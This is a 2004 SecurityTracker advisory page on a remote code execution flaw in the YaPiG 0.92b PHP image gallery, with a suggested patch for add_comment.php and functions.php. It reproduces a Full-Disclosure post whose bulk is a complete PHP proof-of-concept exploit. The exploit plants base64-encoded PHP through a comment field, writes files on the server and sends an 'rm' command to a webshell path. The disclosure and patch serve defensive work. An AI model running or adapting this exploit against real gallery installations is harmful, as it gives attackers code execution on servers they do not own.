Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
YaPiG Input Validation Holes Let Remote Users Execute Arbitrary Commands
|
|
SecurityTracker Alert ID: 1010970 |
|
SecurityTracker URL: http://securitytracker.com/id/1010970
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Aug 18 2004
|
Impact:
Execution of arbitrary code via network, Modification of user information, User access via network
|
Exploit Included: Yes
|
Version(s): 0.92b
|
Description:
An input validation vulnerability was reported in YaPiG. A remote user can execute arbitrary operating system commands on the target system.
aCiDBiTS reported that 'add_comments.php' and 'functions.php' do not properly validate user-supplied input. A remote user can send specially crafted inputs to create a file with an arbitrary file extension and containing arbitrary contents.
A remote user can exploit these flaws to upload a PHP file and then have the web server execute the PHP code.
|
Impact:
A remote user can execute arbitrary commands on the target system with the privileges of the target web service.
|
Solution:
No vendor solution was available at the time of this entry.
The author of the report has provided the following unofficial workaround:
add_comment.php
line 105:
$comments_file= $gid_dir . $gid . "_" .
$phid;
Modify with:
$comments_file= $gid_dir . $gid . "_" .
intval($phid);
functions.php, construct_comment_line()
line 699-700:
$linea=$linea . $data_array['mail'] .
$SEPARATOR;
$linea=$linea . $data_array['web'] .
$SEPARATOR;
Modify with:
$linea=$linea .
htmlspecialchars($data_array['mail']) . $SEPARATOR;
$linea=$linea .
htmlspecialchars($data_array['web']) . $SEPARATOR;
|
Vendor URL: yapig.sourceforge.net/ (Links to External Site)
|
Cause:
Access control error, Input validation error
|
Underlying OS:
Linux (Any), UNIX (Any)
|
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Tue, 17 Aug 2004 16:18:18 +0000
Subject: [Full-Disclosure] YaPiG 0.92b add_coment PHP Insertion Proof of Concept
|
#!/usr/bin/php
<?
/*
YaPiG 0.92b add_coment PHP Insertion Proof of Concept
By aCiDBiTS acidbits@hotmail.com 07-August-2004
Description:
YaPiG (http://yapig.sourceforge.net/) is a PHP Image Gallery script.
This Proof of Concept creates a php file that echoes a notice.
First it determines a valid photo directory where to create the script.
Then creates a crafted comment saved in a new .php file. This comment
contains an encoded webshell. Once this .php file is opened, the code
contained creates test.php.
Usage (in my debian box):
php4 -q yapig_addc_poc.php "http://127.0.0.1/yapig-0.92b"
Vulnerability:
There is no user input sanization of some parameters in add_comment.php
and functions.php.This allows to create a file with any extension, and we
can
insert any code in it. Version 0.92b is vulnerable, I haven't tested older
ones.
Workaround. Modify this lines of code:
add_comment.php
line 105:
$comments_file= $gid_dir . $gid . "_" . $phid;
Modify with:
$comments_file= $gid_dir . $gid . "_" . intval($phid);
functions.php, construct_comment_line()
line 699-700:
$linea=$linea . $data_array['mail'] . $SEPARATOR;
$linea=$linea . $data_array['web'] . $SEPARATOR;
Modify with:
$linea=$linea . htmlspecialchars($data_array['mail']) . $SEPARATOR;
$linea=$linea . htmlspecialchars($data_array['web']) . $SEPARATOR;
*/
echo "+-------------------------------------------------------+\n| YaPiG
0.92b add_coment PHP Insertion Proof of Concept |\n| By aCiDBiTS
acidbits@hotmail.com 07-August-2004
|\n+-------------------------------------------------------+\n\n";
$websh="<?php
\$f=fopen(trim(base64_decode(dGVzdC5waHAg)),w);fputs(\$f,trim(base64_decode(PD8gZWNobyAnPHByZT4gXCAgLyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXCAgLzxicj4gKE9vKSAgVGhpcyBnYWxsZXJ5IGlzIHZ1bG5lcmFibGUgISAgKG9PKTxicj4vL3x8XFxcXCAgICAgICAgICAgICAgICA
gICAgICAgICAgICAgIC8vfHxcXFxcIDwvcHJlPic7Pz4K)));fclose(\$f);
?>";
if($argc<2) die("Usage: ".$argv[0]." URL_to_YaPiG_script\n\n");
$host=$argv[1];
if(substr($host,strlen($host)-1,1)!='/') $host.='/';
echo "[+] Getting valid gid & photo path ... ";
$webc=get_web($host);
$temp=explode(";gid=",$webc);
$gid=intval($temp[1]);
$temp=explode("photos/",$webc);
$temp=explode("/",$temp[1]);
$path=$temp[0];
if( !$gid || !$path ) die( "Failed!\n\n");
echo "OK\n GID: $gid\n Path: ".$host."photos/".$path."/\n\n";
echo "[+] Creating notice script file ... ";
send_post( $host."add_comment.php?gid=".$gid."&phid=.php",
"tit=a&aut=a&mail=".urlencode($websh)."&web=&msg=a&date=&send=Send");
$webc=get_web( $host."photos/".$path."/".$gid."_.php" );
send_post( $host."photos/".$path."/acidwebshell.php", "c=".urlencode("rm
".$gid."_.php") );
echo "OK\n Now go to: ".$host."photos/".$path."/test.php";
die("\n\n \ / \ /\n (Oo) Done! (oO)\n //||\\\\
//||\\\\\n\n");
function get_web($url)
{
$ch=curl_init();
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
$data=curl_exec ($ch);
curl_close ($ch);
return $data;
}
function send_post($url,$data)
{
$ch=curl_init();
curl_setopt ($ch, CURLOPT_URL, $url );
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $data );
$data=curl_exec ($ch);
curl_close ($ch);
return $data;
}
/* \ /
(Oo)
//||\\ */
?>
_________________________________________________________________
Add photos to your messages with MSN 8. Get 2 months FREE*.
http://join.msn.com/?page=features/featuredemail
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
|
|
Go to the Top of This SecurityTracker Archive Page
|
